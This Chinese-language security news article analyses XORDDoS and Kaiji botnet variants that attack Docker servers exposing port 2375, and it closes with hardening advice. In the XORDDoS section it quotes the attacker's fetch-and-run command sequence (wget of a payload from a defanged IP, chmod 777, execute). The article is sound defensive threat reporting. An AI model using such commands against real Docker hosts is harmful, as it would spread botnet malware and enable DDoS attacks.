Linux僵尸网络最新变种现身：Docker服务器惨遭殃及

研究人员近期发现了2个攻击Docker服务器的Linux僵尸网络的变种，分别是XORDDoS 恶意软件和Kaiji DDoS恶意软件。将Docker 服务器作为目标是XORDDoS和 Kaiji恶意软件的新变化，之前这两款恶意软件的目标是云系统中的Linux 主机。最近Kaiji首次被曝影响物联网设备。攻击者常常使用僵尸网络在扫描了SSH 和Telnet端口后执行暴力破解攻击。这两款恶意软件也搜索了暴露2375 端口的Docker服务器。2375端口是Docker API使用的一个端口，用于非加密或非认证的通信。
这两个恶意软件变种的攻击方法有明显的差异。XORDDoS 攻击会利用Docker服务器来感染服务器上的容器，而Kaiji 攻击会在感染的服务器上部署自己的容器，用于DDoS 恶意软件的安装。

XORDDoS 恶意软件分析
XORDDoS 恶意软件的感染是从攻击者检索暴露Docker API端口（2375）的主机开始的。然后，发送一个命令来列出Docker服务器上的所有容器。然后，攻击者执行以下命令，用XORDDoS 恶意软件来感染所有的容器：
wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP
chmod 777 VIP
./VIP
XORDDoS payload 使用了其他攻击中的XOR key来加密字符串，以及与C2 服务器进行通信。也可以在自己的机器上创建多个副本作为驻留机制。

图 1. XORDDoS创建多个副本的代码段
Payload会启动SYN、ACK、DNS等DDoS 攻击类型。

图 2. XORDDoS 启动不同类型DDoS攻击的代码段
恶意软件可以下载和执行下一阶段的恶意软件或对自己进行升级。

图 3. 表明XORDDoS下载和升级自己的代码段
恶意软件会收集以下与发起DDoS 攻击相关的数据：
· CPU信息；
· 运行进程的MD5；
· 内存信息；
· 网络速度；
· 运行进程的PID。
需要注意的是XORDDoS 恶意软件变种中的大多数恶意行为都在之前的恶意软件变种中出现过。
研究人员进一步分析攻击者的URL发现，其他恶意软件也攻击过Docker API，比如Dofloo/AESDDoS Linux 僵尸网络的变种Backdoor.Linux.DOFLOO.AB。

Kaiji 恶意软件分析
与 XORDDoS 恶意软件相似，Kaiji 现在的攻击目标也是Docker 服务器。其运营者扫描了网络上暴露了2375 端口的主机。找到目标后，会部署一个伪造的ARM容器来执行Kaiji 二进制文件。
123.sh 脚本会下载和执行恶意软件payload——Linux_arm。之后，脚本会移除DDoS 操作不需要的其他的Linux二进制文件：

图 4. 下载和执行123.sh的查询

图 5. 表明移除Linux二进制文件的代码段
Payload linux_arm是Kaiji DDoS 恶意软件会执行以下DDoS 攻击：
· ACK 攻击；
· IPS 欺骗攻击；
· SSH 攻击；
· SYN 攻击；
· SYNACK 攻击；
· TCP 洪泛攻击；
· UDP 洪泛攻击。
恶意软件会收集以下数据，用于前述的攻击中：
· CPU信息；
· 目录；
· 域名；
· 主机IP 地址；
· 运行进程的PID；
· URL 方案。

如何应对？
恶意软件变种背后的攻击者还在不断地对恶意软件进行升级、加入新的功能，因此可以发起针对攻击入口点的攻击。在云端，Docker 服务器越来越多的成为攻击者的目标。因此，研究人员建议采取以下措施来保护Docker 服务器：
· 保护容器主机安全。利用监控工具来确保容器操作系统中的主机容器的安全。
· 保护网络环境安全。使用IPS和web过滤来提供内部和外部流量的可视性。
· 确保管理栈的安全。监控和确保容器注册表的安全，锁定Kubernetes 安装。
最佳实践：
· 遵循推荐的最佳安全实践。
· 使用安全工具来扫描和确保容器安全。
参考及来源：http://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/